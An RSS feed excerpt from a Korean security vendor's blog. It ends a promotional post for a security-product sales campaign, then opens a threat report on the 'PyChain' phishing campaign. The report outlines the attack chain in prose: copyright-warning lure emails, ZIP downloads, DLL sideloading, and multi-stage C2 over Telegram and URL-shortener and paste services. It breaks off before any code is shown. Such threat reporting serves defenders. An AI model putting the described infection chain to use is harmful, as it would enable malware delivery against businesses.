&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;- 이스트시큐리티&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;제품을&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;처음&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;도입하는&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;신규 기업 고객&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;-&amp;nbsp;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;과거&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;거래&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;이력이&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;있고&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;재구매를&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;검토&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;중인&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;기업&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️&lt;/span&gt;&lt;b&gt;신청하기 :&lt;/b&gt;&amp;nbsp;&lt;a href=&quot;https://forms.office.com/r/QhXhQYKf2X&quot;&gt;https://forms.office.com/r/QhXhQYKf2X&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;Re:START 프로모션 혜택 안내&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; background-color: #ffffff; text-align: start;&quot;&gt; &lt;/span&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&lt;/b&gt;혜택 1 &amp;mdash; Alan Works 계정 무료 제공&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;알약 / 알툴즈 / 문서중앙화&amp;nbsp;신규 도입 시, 도입 금액&amp;nbsp;200만원당 Alan Works 계정 1개(1년 이용권)&amp;nbsp;를 무료로 제공합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보안 솔루션 도입과 동시에, 기업용 안전한 멀티 LLM 플랫폼인&amp;nbsp;Alan Works&amp;nbsp;까지 확보할 수 있는 기회입니다. AI 업무 도구를 도입하고 싶지만 데이터 보안이 걱정되셨던 조직이라면 더욱 주목할 만한 혜택입니다.&lt;/span&gt;&lt;/p&gt;
&lt;h3 style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; background-color: #ffffff; text-align: start;&quot;&gt; &lt;/span&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/b&gt;혜택 2 &amp;mdash; 구매 금액 구간별 프리미엄 경품&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;구매 금액에 따라 단계별 프리미엄 경품을 제공합니다. 자세한 경품 내역은 아래 이미지를 통해 확인하세요.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 3.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/YFN1H/dJMb99Mi25n/7GSRkugjuCEG0Yptk6kNG1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/YFN1H/dJMb99Mi25n/7GSRkugjuCEG0Yptk6kNG1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/YFN1H/dJMb99Mi25n/7GSRkugjuCEG0Yptk6kNG1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYFN1H%2FdJMb99Mi25n%2F7GSRkugjuCEG0Yptk6kNG1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1400&quot; height=&quot;1400&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 3.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;이런 조직이라면, 지금 바로 신청하세요!&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;보안 솔루션 도입을 고민해왔지만 비용&amp;middot;복잡성이 부담스러웠던 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;eGISEC 현장을 방문하지 못했지만 혜택을 받고 싶은 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;랜섬웨어&amp;middot;악성코드 대응 체계를 새롭게 구축하려는 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;생성형 AI 도입과 함께 데이터 보안을 강화하고 싶은 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;기존 제품에 새로운 보안 솔루션을 추가 확장하려는 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 4.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;&gt;&lt;a href=&quot;https://forms.office.com/r/QhXhQYKf2X&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bBVKPi/dJMb99Mi25m/ktzOgTouWbFmgv1Ssde50k/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbBVKPi%2FdJMb99Mi25m%2FktzOgTouWbFmgv1Ssde50k%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1400&quot; height=&quot;1400&quot; data-filename=&quot;ESTsecurity_신규윈백프로모션_Variation_4분할 4.jpg&quot; data-origin-width=&quot;1400&quot; data-origin-height=&quot;1400&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;기업 보안, 가장 좋은 타이밍은 바로 지금입니다. Re:START 프로모션 기간 동안 가장 유리한 조건으로 이스트시큐리티의 보안 솔루션을 도입하고, 체계적인 보안 환경을 갖춰보세요.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;프로모션 기간은 &lt;b&gt;4월 30일까지&lt;/b&gt;입니다. 기회를 놓치지 마세요!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>기술보호</category>
      <category>기업백신</category>
      <category>기업보안</category>
      <category>기업보안솔루션</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5736</guid>
      <comments>https://alyacofficialblog.tistory.com/5736#entry5736comment</comments>
      <pubDate>Thu, 19 Mar 2026 14:00:47 +0900</pubDate>
    </item>
    <item>
      <title>베트남 위협행위자의 PyChain 캠페인 : 저작권 경고 이메일로 시작한 글로벌 피싱의 기술적 진화</title>
      <link>https://alyacofficialblog.tistory.com/5740</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bmwosQ/dJMcafFSCea/vRLW3WVW65Lwp7lyMRQ1Ak/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bmwosQ/dJMcafFSCea/vRLW3WVW65Lwp7lyMRQ1Ak/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bmwosQ/dJMcafFSCea/vRLW3WVW65Lwp7lyMRQ1Ak/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbmwosQ%2FdJMcafFSCea%2FvRLW3WVW65Lwp7lyMRQ1Ak%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;ldquo;귀하의 저작권 침해가 확인되었습니다&lt;span&gt;.&amp;rdquo; &lt;/span&gt;한 줄로 시작되는 이메일이 최근 기업 담당자들의 수신함에 자주 들어오고 있습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;겉으로는 법적 경고처럼 보이지만&lt;span&gt;, &lt;/span&gt;실제로는 피싱 공격의 출발점입니다&lt;span&gt;. &lt;/span&gt;이스트시큐리티 대응센터&lt;span&gt;(ESRC)&lt;/span&gt;는 이 캠페인을&lt;span&gt; 1&lt;/span&gt;년 넘게 추적해 왔으며&lt;span&gt;, &lt;/span&gt;그 과정에서 공격 방식이 여러 단계로 바뀌는 것을 확인했습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;초기에는&lt;span&gt; GitHub, Dropbox &lt;/span&gt;같은 신뢰받는 서비스를 이용해 악성 모듈을 내려받는 방식으로 시작되었지만&lt;span&gt;, &lt;/span&gt;이후 정상 서명된 실행 파일을 이용한&lt;span&gt; DLL &lt;/span&gt;사이드로딩&lt;span&gt;, Telegram Bot&lt;/span&gt;과&lt;span&gt; URL &lt;/span&gt;단축 서비스&lt;span&gt;, paste &lt;/span&gt;사이트를 거치는 다단계 페이로드 체인이 등장했습니다&lt;span&gt;. &lt;/span&gt;유포 주제도 저작권 및 법률 내용에서 비즈니스 제안&lt;span&gt;, &lt;/span&gt;채용&lt;span&gt;, AI &lt;/span&gt;영상 도구 등으로 넓어졌고&lt;span&gt;, &lt;/span&gt;한국어와 영어를 넘어&lt;span&gt; 30&lt;/span&gt;개 이상 언어로 작성된 피싱 파일이 수집되었습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;이 캠페인의 배후는 베트남 국가의 위협행위자로 이스트시큐리티는 해당 위협행위자를&lt;span&gt; &amp;lsquo;LoneNone&amp;rsquo;&lt;/span&gt;으로&lt;span&gt;, Python &lt;/span&gt;과 다단계&lt;span&gt; C2 &lt;/span&gt;체인의 특징을 바탕으로&lt;span&gt; &amp;lsquo;PyChain&amp;rsquo; &lt;/span&gt;캠페인으로 명명했습니다&lt;span&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;3726&quot; data-origin-height=&quot;1818&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/di4T7P/dJMcajuOv0v/ADAcfDqNEGqMBu91q324rk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/di4T7P/dJMcajuOv0v/ADAcfDqNEGqMBu91q324rk/img.png&quot; data-alt=&quot;[그림 1] PyChain 캠페인 공격 타겟 국가 분포&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/di4T7P/dJMcajuOv0v/ADAcfDqNEGqMBu91q324rk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdi4T7P%2FdJMcajuOv0v%2FADAcfDqNEGqMBu91q324rk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;3726&quot; height=&quot;1818&quot; data-origin-width=&quot;3726&quot; data-origin-height=&quot;1818&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] PyChain 캠페인 공격 타겟 국가 분포&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 포스트에서는 &lt;span&gt;LoneNone &lt;/span&gt;위협행위자의 최근 위협사례를 분석하고&lt;span&gt;, PyChain &lt;/span&gt;캠페인의 진화 과정을&lt;span&gt; 7&lt;/span&gt;개&lt;span&gt; Operation&lt;/span&gt;로 분류하고 기술적 특성을 정리하였습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;최근 위협 사례 분석&lt;/span&gt;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;&lt;span&gt;1) &lt;/span&gt;개요 및 실행 흐름&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 발견된 동일 위협행위자의 위협 이메일은&lt;span&gt; &quot;&lt;/span&gt;저작권 침해&lt;span&gt;&quot; &lt;/span&gt;관련 내용을 여전히 사용하고 있습니다&lt;span&gt;. &lt;/span&gt;이메일 본문에는 위반 내용 확인&lt;span&gt;&amp;middot;&lt;/span&gt;법적 조치 안내 등을 이유로&lt;span&gt; PDF &lt;/span&gt;또는 문서 링크가 포함되어 있으며&lt;span&gt;, &lt;/span&gt;수신자가 해당 링크를 클릭하면 외부로부터&lt;span&gt; ZIP &lt;/span&gt;파일이 다운로드 됩니다&lt;span&gt;. &lt;/span&gt;사용자가 다운로드한&lt;span&gt; ZIP&lt;/span&gt;을 압축 해제한 뒤 내부에 포함된 실행 파일&lt;span&gt;(EXE &lt;/span&gt;등&lt;span&gt;)&lt;/span&gt;을 직접 실행함으로써 공격이 시작됩니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;즉&lt;span&gt;, &lt;/span&gt;초기 침투는 이메일&lt;span&gt; &amp;rarr; &lt;/span&gt;링크 클릭&lt;span&gt; &amp;rarr; ZIP &lt;/span&gt;다운로드&lt;span&gt; &amp;rarr; &lt;/span&gt;압축 해제 및 내부 파일 실행의 단계로 이루어지며&lt;span&gt;, &lt;/span&gt;사용자 실행 시점 이후에는&lt;span&gt; DLL &lt;/span&gt;사이드로딩을 통한&lt;span&gt; 1&lt;/span&gt;차 로더 실행&lt;span&gt;, C2&lt;/span&gt;에서의&lt;span&gt; 2&lt;/span&gt;차 페이로드 다운로드&lt;span&gt;, Telegram &lt;/span&gt;및&lt;span&gt; urlvanish.com&lt;/span&gt;을 이용한&lt;span&gt; 2&lt;/span&gt;차&lt;span&gt; C2 &lt;/span&gt;통신이 이어집니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;752&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Udmwo/dJMcafML1GW/uD9mgjFocACKm6IuPulHN1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Udmwo/dJMcafML1GW/uD9mgjFocACKm6IuPulHN1/img.png&quot; data-alt=&quot;[그림 2] 엔터회사 사칭 이메일&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Udmwo/dJMcafML1GW/uD9mgjFocACKm6IuPulHN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUdmwo%2FdJMcafML1GW%2FuD9mgjFocACKm6IuPulHN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;873&quot; height=&quot;752&quot; data-origin-width=&quot;873&quot; data-origin-height=&quot;752&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] 엔터회사 사칭 이메일&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1043&quot; data-origin-height=&quot;333&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/brXJXc/dJMcahDLNde/HiSoSmyucYg4dhPR5QeJuk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/brXJXc/dJMcahDLNde/HiSoSmyucYg4dhPR5QeJuk/img.png&quot; data-alt=&quot;[그림 3] 공격 흐름도&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/brXJXc/dJMcahDLNde/HiSoSmyucYg4dhPR5QeJuk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbrXJXc%2FdJMcahDLNde%2FHiSoSmyucYg4dhPR5QeJuk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1043&quot; height=&quot;333&quot; data-origin-width=&quot;1043&quot; data-origin-height=&quot;333&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] 공격 흐름도&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;&lt;span&gt;2) &lt;/span&gt;상세 코드 분석&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2-1) &lt;/span&gt;초기 침투 파일&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;피싱 이메일을 통해 다운로드 받은&lt;span&gt; ZIP&lt;/span&gt;파일의 파일 목록은 다음과 같고&lt;span&gt;, &lt;/span&gt;조사에서 확인된 결과&lt;span&gt;.exe &lt;/span&gt;파일을 제외한 모든 파일은 숨김 옵션이 설정되어 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;632&quot; data-origin-height=&quot;178&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/LNEr0/dJMcabwNgVu/dtl4AmkvrvDrkCXNBQ1qM0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/LNEr0/dJMcabwNgVu/dtl4AmkvrvDrkCXNBQ1qM0/img.png&quot; data-alt=&quot;[그림 4] ZIP 파일 내부 파일 목록&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/LNEr0/dJMcabwNgVu/dtl4AmkvrvDrkCXNBQ1qM0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FLNEr0%2FdJMcabwNgVu%2Fdtl4AmkvrvDrkCXNBQ1qM0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;632&quot; height=&quot;178&quot; data-origin-width=&quot;632&quot; data-origin-height=&quot;178&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 4] ZIP 파일 내부 파일 목록&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
